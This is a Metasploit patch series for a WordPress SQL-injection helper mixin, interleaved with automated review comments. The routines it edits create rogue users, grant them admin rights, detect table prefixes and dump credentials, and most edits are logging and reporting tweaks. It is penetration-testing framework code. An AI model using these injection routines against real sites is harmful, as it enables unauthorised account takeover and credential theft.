@@ -50,7 +50,7 @@ def wordpress_sqli_create_user(username, password, email) display_name = '#{username}' SQL - @sqli.raw_run_sql(query.strip.gsub(/\n/, ' ').gsub(/\s+/, ' ')) + @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) print_status("{WPSQLi} User '#{username}' created or updated successfully.") end @@ -83,7 +83,8 @@ def wordpress_sqli_grant_admin_privileges(username) # @return [String] The detected table prefix # @raise [Failure::UnexpectedReply] If the table prefix could not be detected def wordpress_sqli_identify_table_prefix - indicator = rand() + indicator = rand(0..19) + random_alias = Rex::Text.rand_text_alpha(1..5) default_prefix_check = "SELECT #{indicator} FROM information_schema.tables WHERE table_name = 'wp_users'" result = @sqli.run_sql(default_prefix_check)&.to_i @@ -92,18 +93,19 @@ def wordpress_sqli_identify_table_prefix return 'wp_' end print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns #{random_alias} + WHERE #{random_alias}.table_schema = tables.table_schema + AND #{random_alias}.table_name = tables.table_name + AND #{random_alias}.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 SQL prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) From f52cd8ba574a4fe92beaac73212fbe78ce8da064 Mon Sep 17 00:00:00 2001 
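Review bot: `rand(0..19)` can yield 0, and `result` comes from `&.to_i`, which is also 0 for an empty or non-numeric reply, so roughly one run in twenty can report the default `wp_` prefix when the table was never confirmed. Excluding zero removes that false positive: `indicator = rand(1..19)`. The default-prefix check also has no schema condition, unlike the custom-prefix query below it, so a `wp_users` table in any other visible schema satisfies it; appending `AND table_schema = database()` would make the two queries consistent. The method continues past the end of this hunk.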
From: Chocapikk Date: Mon, 30 Sep 2024 13:01:25 +0200 Subject: [PATCH 10/22] Add coding: binary header --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 2d2cb6a0f97a..645131417818 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -1,3 +1,5 @@ +# -*- coding: binary -*- + module Msf # This module provides reusable SQLi (SQL Injection) helper functions # for WordPress exploits in Metasploit Framework. These functions allow From 05c579fd65f0458b238e03d5f4c30fdc032aa4c8 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Thu, 3 Oct 2024 16:12:37 +0200 Subject: [PATCH 11/22] Add report_host, report_service and report_vuln --- .../exploit/remote/http/wordpress/sqli.rb | 28 +++++++++++++++++-- 1 file changed, 26 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 645131417818..d77236f236d4 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -1,5 +1,3 @@ -# -*- coding: binary -*- - module Msf # This module provides reusable SQLi (SQL Injection) helper functions # for WordPress exploits in Metasploit Framework. These functions allow @@ -154,6 +152,8 @@ def wordpress_sqli_get_users_credentials(count = 10) protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED }) + + print_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") end print_status('{WPSQLi} Dumped user data:') 
@@ -170,6 +170,30 @@ def wordpress_sqli_get_users_credentials(count = 10) print_good("Loot saved to: #{loot_path}") + print_status('{WPSQLi} Reporting host...') + report_host(host: datastore['RHOST']) + + print_status('{WPSQLi} Reporting service...') + report_service( + host: datastore['RHOST'], + port: datastore['RPORT'], + proto: 'tcp', + name: fullname, + info: description.strip + ) + + print_status('{WPSQLi} Reporting vulnerability...') + report_vuln( + host: datastore['RHOST'], + port: datastore['RPORT'], + proto: 'tcp', + name: fullname, + refs: references, + info: description.strip + ) + + print_good('{WPSQLi} Reporting completed successfully.') + return data end end From d01e8d4dd564da9e5c3b46854d27523da4f9ec79 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:23 +0200 Subject: [PATCH 12/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index d77236f236d4..1ae08c3c8b31 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -52,7 +52,7 @@ def wordpress_sqli_create_user(username, password, email) @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) - print_status("{WPSQLi} User '#{username}' created or updated successfully.") + vprint_status("{WPSQLi} User '#{username}' created or updated successfully.") end # Grant admin privileges to the specified user by creating or updating the appropriate meta entry. From 8cbe572f49e52f9c2053e56ab65072f8f1ff7e37 Mon Sep 17 00:00:00 2001 
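Review bot: In the added `report_service` call, `name: fullname` stores the module's path as the service name and `info: description.strip` stores the module description as the service banner, so the workspace's service table ends up describing the module rather than the service found on the port. The service entry should carry the protocol, e.g. `name: (ssl ? 'https' : 'http')`, assuming the HTTP client helpers are available to includers of this mixin, and the `info:` line should be dropped. The module name and description belong only in the `report_vuln` call. These three report calls also sit at the end of `wordpress_sqli_get_users_credentials`, so a host, service and vulnerability are recorded only when the dump path runs; a short comment saying that this is intended would help. The function body starts outside this hunk.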
From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:32 +0200 Subject: [PATCH 13/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 1ae08c3c8b31..6d1e8627420c 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -114,7 +114,7 @@ def wordpress_sqli_identify_table_prefix return nil end - print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + vprint_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") prefix end From c1521633f4df6eb8b6f032be4e1f2a56bdd166a6 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:42 +0200 Subject: [PATCH 14/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 6d1e8627420c..d74edbbb8c14 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -75,7 +75,7 @@ def wordpress_sqli_grant_admin_privileges(username) SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) - print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.") + vprint_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.") end # Identify the table prefix for the WordPress installation From 31a66d537b8547cc3d6d5b4fdb91c230f9bdd0f8 Mon Sep 17 00:00:00 2001 
From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:03:52 +0200 Subject: [PATCH 15/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index d74edbbb8c14..85c8523c7fc8 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -89,7 +89,7 @@ def wordpress_sqli_identify_table_prefix result = @sqli.run_sql(default_prefix_check)&.to_i if result == indicator - print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") + vprint_status("{WPSQLi} Retrieved default table prefix: 'wp_'") return 'wp_' end print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') From 3987a761e7555dc3c17d7b52dd6115556c0819eb Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:01 +0200 Subject: [PATCH 16/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 85c8523c7fc8..7fb5bbad11c6 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
@@ -92,7 +92,7 @@ def wordpress_sqli_identify_table_prefix vprint_status("{WPSQLi} Retrieved default table prefix: 'wp_'") return 'wp_' end - print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + vprint_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') query = <<-SQL SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) From de5324e1603cc420ebde6fdba53d72fc018e7479 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:13 +0200 Subject: [PATCH 17/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 7fb5bbad11c6..8caa9d9f9054 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -173,7 +173,7 @@ def wordpress_sqli_get_users_credentials(count = 10) print_status('{WPSQLi} Reporting host...') report_host(host: datastore['RHOST']) - print_status('{WPSQLi} Reporting service...') + vprint_status('{WPSQLi} Reporting service...') report_service( host: datastore['RHOST'], port: datastore['RPORT'], From 6c048df53f5ad0707c4cd8ff935ebd9458d8ee86 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:23 +0200 Subject: [PATCH 18/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 8caa9d9f9054..a627495632a0 100644 
--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -182,7 +182,7 @@ def wordpress_sqli_get_users_credentials(count = 10) info: description.strip ) - print_status('{WPSQLi} Reporting vulnerability...') + vprint_status('{WPSQLi} Reporting vulnerability...') report_vuln( host: datastore['RHOST'], port: datastore['RPORT'], From 94145eafe9a869e0d471262f94b4bee974747501 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:32 +0200 Subject: [PATCH 19/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index a627495632a0..ad9a3603fe55 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -153,7 +153,7 @@ def wordpress_sqli_get_users_credentials(count = 10) status: Metasploit::Model::Login::Status::UNTRIED }) - print_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") + vprint_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") end print_status('{WPSQLi} Dumped user data:') From fb35f6709a3518bf14bfbf234e4ae3165fe20c10 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:44 +0200 Subject: [PATCH 20/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index ad9a3603fe55..2d817f0e798c 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -192,7 +192,7 @@ def wordpress_sqli_get_users_credentials(count = 10) info: description.strip ) - print_good('{WPSQLi} Reporting completed successfully.') + vprint_good('{WPSQLi} Reporting completed successfully.') return data end From c15f18631122cb9db2a2dd1d64296a6fb51e2fe7 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 00:04:54 +0200 Subject: [PATCH 21/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 2d817f0e798c..f6f21bbdaff6 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -156,7 +156,7 @@ def wordpress_sqli_get_users_credentials(count = 10) vprint_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.") end - print_status('{WPSQLi} Dumped user data:') + vprint_status('{WPSQLi} Dumped user data:') print_line(table.to_s) loot_path = store_loot( From c259ce090a16b1838bb3f3616b037f94c8dc1575 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 9 Oct 2024 17:22:33 +0200 Subject: [PATCH 22/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Diego Ledda --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index f6f21bbdaff6..7777e0fbf04a 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
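Review bot: After this change the heading `'{WPSQLi} Dumped user data:'` is printed only in verbose mode, while the following `print_line(table.to_s)` still prints unconditionally, so a normal run shows the table with no heading. Judging by the function name the table holds the dumped account data, which `store_loot` already persists a few lines below. Gating the table the same way, `vprint_line(table.to_s)`, keeps the two lines consistent and keeps that data out of console logs and spool files unless verbosity is requested. If the table is meant to be shown always, the heading should stay at `print_status`.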
@@ -170,7 +170,7 @@ def wordpress_sqli_get_users_credentials(count = 10) print_good("Loot saved to: #{loot_path}") - print_status('{WPSQLi} Reporting host...') + vprint_status('{WPSQLi} Reporting host...') report_host(host: datastore['RHOST']) vprint_status('{WPSQLi} Reporting service...')